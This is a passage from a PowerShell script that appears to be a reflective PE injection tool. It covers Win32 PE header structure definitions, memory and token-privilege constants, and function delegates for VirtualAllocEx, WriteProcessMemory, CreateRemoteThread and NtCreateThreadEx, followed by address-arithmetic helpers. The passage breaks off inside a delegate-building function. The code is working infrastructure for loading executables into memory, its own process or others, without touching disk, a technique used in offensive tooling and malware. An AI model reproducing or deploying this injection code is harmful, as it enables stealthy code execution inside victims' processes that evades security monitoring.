$TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 #Struct IMAGE_NT_HEADERS64 $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 #Struct IMAGE_NT_HEADERS32 $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 #Struct IMAGE_DOS_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) $e_resField.SetCustomAttribute($AttribBuilder) $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) $e_res2Field.SetCustomAttribute($AttribBuilder) $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER #Struct IMAGE_SECTION_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) $nameField.SetCustomAttribute($AttribBuilder) $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER #Struct IMAGE_BASE_RELOCATION $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8) $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION #Struct IMAGE_IMPORT_DESCRIPTOR $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20) $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR #Struct IMAGE_EXPORT_DIRECTORY $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40) $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY #Struct LUID $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null $LUID = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID #Struct LUID_AND_ATTRIBUTES $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES #Struct TOKEN_PRIVILEGES $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES return $Win32Types } Function Get-Win32Constants { $Win32Constants = New-Object System.Object $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000 $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80 $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000 $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40 $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100 $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000 $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008 $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020 $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2 $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0 return $Win32Constants } Function Get-Win32Functions { $Win32Functions = New-Object System.Object $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr]) $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy $memsetAddr = Get-ProcAddress msvcrt.dll memset $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]) $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]) $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress #This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr]) $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool]) $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool]) $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr]) $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32]) $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool]) $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool]) $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr]) $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool]) $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool]) $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool]) $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr]) $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread return $Win32Functions } ##################################### ##################################### ########### HELPERS ############ ##################################### #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses Function Sub-SignedIntAsUnsigned { Param( [Parameter(Position = 0, Mandatory = $true)] [Int64] $Value1, [Parameter(Position = 1, Mandatory = $true)] [Int64] $Value2 ) [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) if ($Value1Bytes.Count -eq $Value2Bytes.Count) { $CarryOver = 0 for ($i = 0; $i -lt $Value1Bytes.Count; $i++) { $Val = $Value1Bytes[$i] - $CarryOver #Sub bytes if ($Val -lt $Value2Bytes[$i]) { $Val += 256 $CarryOver = 1 } else { $CarryOver = 0 } [UInt16]$Sum = $Val - $Value2Bytes[$i] $FinalBytes[$i] = $Sum -band 0x00FF } } else { Throw "Cannot subtract bytearrays of different sizes" } return [BitConverter]::ToInt64($FinalBytes, 0) } Function Add-SignedIntAsUnsigned { Param( [Parameter(Position = 0, Mandatory = $true)] [Int64] $Value1, [Parameter(Position = 1, Mandatory = $true)] [Int64] $Value2 ) [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) if ($Value1Bytes.Count -eq $Value2Bytes.Count) { $CarryOver = 0 for ($i = 0; $i -lt $Value1Bytes.Count; $i++) { #Add bytes [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver $FinalBytes[$i] = $Sum -band 0x00FF if (($Sum -band 0xFF00) -eq 0x100) { $CarryOver = 1 } else { $CarryOver = 0 } } } else { Throw "Cannot add bytearrays of different sizes" } return [BitConverter]::ToInt64($FinalBytes, 0) } Function Compare-Val1GreaterThanVal2AsUInt { Param( [Parameter(Position = 0, Mandatory = $true)] [Int64] $Value1, [Parameter(Position = 1, Mandatory = $true)] [Int64] $Value2 ) [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) if ($Value1Bytes.Count -eq $Value2Bytes.Count) { for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--) { if ($Value1Bytes[$i] -gt $Value2Bytes[$i]) { return $true } elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i]) { return $false } } } else { Throw "Cannot compare byte arrays of different size" } return $false } Function Convert-UIntToInt { Param( [Parameter(Position = 0, Mandatory = $true)] [UInt64] $Value ) [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value) return ([BitConverter]::ToInt64($ValueBytes, 0)) } Function Get-Hex { Param( [Parameter(Position = 0, Mandatory = $true)] $Value #We will determine the type dynamically ) $ValueSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2 $Hex = "0x{0:X$($ValueSize)}" -f [Int64]$Value #Passing a IntPtr to this doesn't work well. Cast to Int64 first. return $Hex } Function Test-MemoryRangeValid { Param( [Parameter(Position = 0, Mandatory = $true)] [String] $DebugString, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 2, Mandatory = $true)] [IntPtr] $StartAddress, [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)] [IntPtr] $EndAddress, [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] [IntPtr] $Size ) [IntPtr]$FinalEndAddress = [IntPtr]::Zero if ($PsCmdlet.ParameterSetName -eq "Size") { [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) } else { $FinalEndAddress = $EndAddress } $PEEndAddress = $PEInfo.EndAddress if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true) { Throw "Trying to write to memory smaller than allocated address range. $DebugString" } if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true) { Throw "Trying to write to memory greater than allocated address range. $DebugString" } } Function Write-BytesToMemory { Param( [Parameter(Position=0, Mandatory = $true)] [Byte[]] $Bytes, [Parameter(Position=1, Mandatory = $true)] [IntPtr] $MemoryAddress ) for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++) { [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset]) } } #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ Function Get-DelegateType { Param ( [OutputType([Type])] [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), [Parameter( Position = 1 )] [Type] $ReturnType = [Void] ) $Domain = [AppDomain]::CurrentDomain $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') 